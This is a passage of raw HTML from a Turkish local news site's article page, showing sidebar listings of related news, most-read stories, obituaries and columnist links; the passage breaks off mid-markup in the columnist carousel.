  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Halk+E%C4%9Fitimi+Merkezinde+kurslar+yeniden+ba%C5%9Flad%C4%B1" title="Halk Eğitimi Merkezinde Kurslar Yeniden Başladı haberleri">Halk Eğitimi Merkezinde Kurslar Yeniden Başladı</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/hububat-alim-fiyati-belli-oldu-h70066.html"  title="Hububat alım fiyatı belli oldu">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/hububat_alim_fiyati_belli_oldu_h70066_c9d55.jpg" alt="Hububat alım fiyatı belli oldu" />
        <span>Hububat alım fiyatı belli oldu</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/il-genelinde-267-bin-500-doz-asi-yapildi-h70065.html"  title="İl genelinde 267 bin 500 doz aşı yapıldı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/il_genelinde_267_bin_500_doz_asi_yapildi_h70065_f13d6.jpg" alt="İl genelinde 267 bin 500 doz aşı yapıldı" />
        <span>İl genelinde 267 bin 500 doz aşı yapıldı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/hobisini-meslek-haline-donusturdu-h70064.html"  title="Hobisini meslek haline dönüştürdü">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/hobisini_meslek_haline_donusturdu_h70064_caa56.jpg" alt="Hobisini meslek haline dönüştürdü" />
        <span>Hobisini meslek haline dönüştürdü</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-19-mayis-mesaji-2-h70063.html"  title="Kaymakam Demir’den 19 Mayıs mesajı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/kaymakam_demirden_19_mayis_mesaji_h70063_66738.jpg" alt="Kaymakam Demir’den 19 Mayıs mesajı" />
        <span>Kaymakam Demir’den 19 Mayıs mesajı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-israil-insanlik-ve-savas-sucu-isliyor-h70062.html"  title="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/baskan_gurbuz_israil_insanlik_ve_savas_sucu_isliyor_h70062_60419.jpg" alt="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”" />
        <span>Başkan Gürbüz, “İsrail insanlık ve savaş suçu...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/goksunlu-milli-futbolcu-kalbine-yenik-dustu-h70060.html"  title="Göksunlu milli futbolcu kalbine yenik düştü">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/goksunlu_milli_futbolcu_kalbine_yenik_dustu_h70060_fddfa.jpeg" alt="Göksunlu milli futbolcu kalbine yenik düştü" />
        <span>Göksunlu milli futbolcu kalbine yenik düştü</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/bakkallar-odasindan-kadin-esnaflara-anneler-gunu-jesti-h70059.html"  title="Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/bakkallar_odasindan_kadin_esnaflara_anneler_gunu_jesti_h70059_6aea3.JPG" alt="Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti" />
        <span>Bakkallar Odası’ndan kadın esnaflara Anneler Günü...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/bakan-mus-esnafa-hibe-desteginin-ayrintilarini-acikladi-h70058.html"  title="Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/bakan_mus_esnafa_hibe_desteginin_ayrintilarini_acikladi_h70058_b9592.jpg" alt="Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı" />
        <span>Bakan Muş, esnafa hibe desteğinin ayrıntılarını...</span>
      </a>
    </div>
      </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes">41.3B</a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/silahla-vurulan-46-yasindaki-kisi-hayatini-kaybetti-h70030.html" title="Silahla vurulan 46 yaşındaki kişi..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/silahla_vurulan_46_yasindaki_kisi_hayatini_kaybetti_h70030_8f301.jpg" alt="Silahla vurulan 46 yaşındaki kişi..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahla-vurulan-46-yasindaki-kisi-hayatini-kaybetti-h70030.html" title="" ><span class="en-hit">1.</span> <strong>Silahla vurulan 46 yaşındaki kişi...</strong> <span class="en-spot en-hidden">Elbistan’da silahla vurularak ağır yaralanan 46 yaşındaki Ali Yalçın...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/tugba-toraman-h69951.html" title="Tuğba Toraman" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/tugba_toraman_h69951_90dc0.jpg" alt="Tuğba Toraman" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/tugba-toraman-h69951.html" title="" ><span class="en-hit">2.</span> <strong>Tuğba Toraman</strong> <span class="en-spot en-hidden">Tuğba Toraman</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ayse-kitiz-46-yasinda-h69990.html" title="Ayşe Kitiz 46 Yaşında ;" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/ayse_kitiz_46_yasinda_h69990_9aaf2.jpg" alt="Ayşe Kitiz 46 Yaşında ;" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ayse-kitiz-46-yasinda-h69990.html" title="" ><span class="en-hit">3.</span> <strong>Ayşe Kitiz 46 Yaşında ;</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/feci-kazada-ayni-aileden-4-kisi-oldu-h70013.html" title="Feci kazada aynı aileden 4 kişi öldü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/feci_kazada_ayni_aileden_4_kisi_oldu_h70013_2c6eb.jpg" alt="Feci kazada aynı aileden 4 kişi öldü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/feci-kazada-ayni-aileden-4-kisi-oldu-h70013.html" title="" ><span class="en-hit">4.</span> <strong>Feci kazada aynı aileden 4 kişi öldü</strong> <span class="en-spot en-hidden">Göksun-Kahramanmaraş karayolunda hafriyat kamyonuna arkadan çarpan...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/17-yasindaki-elbistanli-genc-kizdan-bir-haftadir-haber-alinamiyor-h69979.html" title="17 yaşındaki Elbistanlı genç kızdan..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/17_yasindaki_elbistanli_genc_kizdan_bir_haftadir_haber_alinamiyor_h69979_26eb8.jpg" alt="17 yaşındaki Elbistanlı genç kızdan..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/17-yasindaki-elbistanli-genc-kizdan-bir-haftadir-haber-alinamiyor-h69979.html" title="" ><span class="en-hit">5.</span> <strong>17 yaşındaki Elbistanlı genç kızdan...</strong> <span class="en-spot en-hidden">Kahramanmaraş’taki evinden çıktıktan sonra bir daha kendisinden...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/cihal-ayse-dumlupinar-72-yasinda-h69964.html" title="Cihal (Ayşe) Dumlupınar 72 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/cihal_ayse_dumlupinar_72_yasinda_h69964_1ad6f.jpg" alt="Cihal (Ayşe) Dumlupınar 72 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/cihal-ayse-dumlupinar-72-yasinda-h69964.html" title="" ><span class="en-hit">1.</span> <strong>Cihal (Ayşe) Dumlupınar 72 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ali-bilal-yuce-63-yasinda-h69977.html" title="Ali Bilal Yüce 63 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/ali-bilal-yuce-63-yasinda_e56fb.jpg" alt="Ali Bilal Yüce 63 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ali-bilal-yuce-63-yasinda-h69977.html" title="" ><span class="en-hit">2.</span> <strong>Ali Bilal Yüce 63 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ayse-kitiz-46-yasinda-h69990.html" title="Ayşe Kitiz 46 Yaşında ;" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/ayse_kitiz_46_yasinda_h69990_9aaf2.jpg" alt="Ayşe Kitiz 46 Yaşında ;"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ayse-kitiz-46-yasinda-h69990.html" title="" ><span class="en-hit">3.</span> <strong>Ayşe Kitiz 46 Yaşında ;</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/irfan-koprubasi-89-yasinda-h69897.html" title="İrfan Köprübaşı 89 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/irfan-koprubasi-89-yasinda_3956e.jpg" alt="İrfan Köprübaşı 89 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/irfan-koprubasi-89-yasinda-h69897.html" title="" ><span class="en-hit">4.</span> <strong>İrfan Köprübaşı 89 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sefa-yalcinoz-44-yasinda-h69938.html" title="Sefa Yalçınöz 44 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/04/sefa_yalcinoz_44_yasinda_h69938_74b20.jpg" alt="Sefa Yalçınöz 44 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sefa-yalcinoz-44-yasinda-h69938.html" title="" ><span class="en-hit">5.</span> <strong>Sefa Yalçınöz 44 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/benzer-kaderin-yolculari-filistin-ve-dogu-turkistan-makale,6196.html" title="Benzer kaderin yolcuları: Filistin ve Doğu Türkistan" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="http://www.elbistaninsesi.com/benzer-kaderin-yolculari-filistin-ve-dogu-turkistan-makale,6196.html" title="Benzer kaderin yolcuları: Filistin ve Doğu Türkistan" >Benzer kaderin yolcuları: Filistin ve Doğu Türkistan</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kahrolacaksa-yikilacaksa-yok-olacaksa-makale,6195.html" title="Kahrolacaksa, Yıkılacaksa, Yok Olacaksa" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="http://www.elbistaninsesi.com/kahrolacaksa-yikilacaksa-yok-olacaksa-makale,6195.html" title="Kahrolacaksa, Yıkılacaksa, Yok Olacaksa" >Kahrolacaksa, Yıkılacaksa, Yok Olacaksa</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yasamin-ontolojik-yasasi-anlam-ve-amaclilik-makale,6194.html" title="Yaşamın ontolojik yasası (anlam ve amaçlılık)" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="http://www.elbistaninsesi.com/yasamin-ontolojik-yasasi-anlam-ve-amaclilik-makale,6194.html" title="Yaşamın ontolojik yasası (anlam ve amaçlılık)" >Yaşamın ontolojik yasası (anlam ve amaçlılık)</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/mahsuni-baba-makale,6193.html" title="Mahsuni Baba" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="http://www.elbistaninsesi.com/mahsuni-baba-makale,6193.html" title="Mahsuni Baba" >Mahsuni Baba</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/lailahe-illallah-makale,6192.html" title="Lailahe İllallah" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="http://www.elbistaninsesi.com/lailahe-illallah-makale,6192.html" title="Lailahe İllallah" >Lailahe İllallah</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/filistin-makale,6191.html" title="Filistin" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="http://www.elbistaninsesi.com/filistin-makale,6191.html" title="Filistin" >Filistin</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bayram-in-secimleri-makale,6190.html" title="Bayram&#039;ın Seçimleri" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="http://www.elbistaninsesi.com/bayram-in-secimleri-makale,6190.html" title="Bayram&#039;ın Seçimleri" >Bayram&#039;ın Seçimleri</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/60-li-70-li-yillara-devam-edelim-makale,6189.html" title="60&#039;lı, 70&#039;li yıllara devam edelim..." >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="http://www.elbistaninsesi.com/60-li-70-li-yillara-devam-edelim-makale,6189.html" title="60&#039;lı, 70&#039;li yıllara devam edelim..." >60&#039;lı, 70&#039;li yıllara devam edelim...</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neler-oloji-makale,6187.html" title="NELER OLOJİ " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="http://www.elbistaninsesi.com/neler-oloji-makale,6187.html" title="NELER OLOJİ " >NELER OLOJİ </a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zimem-defteri-makale,6184.html" title="Zimem Defteri" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="http://www.elbistaninsesi.com/zimem-defteri-makale,6184.html" title="Zimem Defteri" >Zimem Defteri</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/cografya-kaderdir-bir-zamanlar-makale,6180.html" title="COĞRAFYA KADERDİR, BİR ZAMANLAR…" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="http://www.elbistaninsesi.com/cografya-kaderdir-bir-zamanlar-makale,6180.html" title="COĞRAFYA KADERDİR, BİR ZAMANLAR…" >COĞRAFYA KADERDİR, BİR ZAMANLAR…</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/veryansin-makale,6179.html" title="VER­YAN­SIN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/IMG_20210216_033715.jpg" alt="Metehan Çağrı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/92/metehan-cagri" title="Metehan Çağrı">Metehan Çağrı</a></h4>
              <a href="http://www.elbistaninsesi.com/veryansin-makale,6179.html" title="VER­YAN­SIN" >VER­YAN­SIN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/sevgisiz-toplum-makale,6169.html" title="Sevgisiz Toplum" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/fatma_gul.jpg" alt="Fatma Gül- Psikolog">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/79/fatma-gul-psikolog" title="Fatma Gül- Psikolog">Fatma Gül- Psikolog</a></h4>
              <a href="http://www.elbistaninsesi.com/sevgisiz-toplum-makale,6169.html" title="Sevgisiz Toplum" >Sevgisiz Toplum</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/birlesin-ey-turk-lemi-birlesin-makale,6166.html" title="BİRLEŞİN EY TÜRK ÂLEMİ BİRLEŞİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="http://www.elbistaninsesi.com/birlesin-ey-turk-lemi-birlesin-makale,6166.html" title="BİRLEŞİN EY TÜRK ÂLEMİ BİRLEŞİN" >BİRLEŞİN EY TÜRK ÂLEMİ BİRLEŞİN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/muhur-ve-elbistanda-kullanimi-makale,6160.html" title="   Mühür ve Elbistan’da Kullanımı" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="http://www.elbistaninsesi.com/muhur-ve-elbistanda-kullanimi-makale,6160.html" title="   Mühür ve Elbistan’da Kullanımı" >   Mühür ve Elbistan’da Kullanımı</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yagmur-icin-allah-a-yalvaris-makale,6159.html" title="YAĞMUR İÇİN ALLAH&#039;A YALVARIŞ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/yagmur-icin-allah-a-yalvaris-makale,6159.html" title="YAĞMUR İÇİN ALLAH&#039;A YALVARIŞ" >YAĞMUR İÇİN ALLAH&#039;A YALVARIŞ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/soz-ustasi-sair-ali-akbas-a-ithaf-makale,6157.html" title="Söz Ustası -Şair Ali Akbaş&#039;a ithaf-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="http://www.elbistaninsesi.com/soz-ustasi-sair-ali-akbas-a-ithaf-makale,6157.html" title="Söz Ustası -Şair Ali Akbaş&#039;a ithaf-" >Söz Ustası -Şair Ali Akbaş&#039;a ithaf-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zamanimizin-evliligi-makale,6139.html" title="Zamanımızın evliliği" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="http://www.elbistaninsesi.com/zamanimizin-evliligi-makale,6139.html" title="Zamanımızın evliliği" >Zamanımızın evliliği</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hayattan-aldigim-bazi-dersler-makale,6138.html" title="HA­YAT­TAN AL­DI­GIM BAZI DERS­LER " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
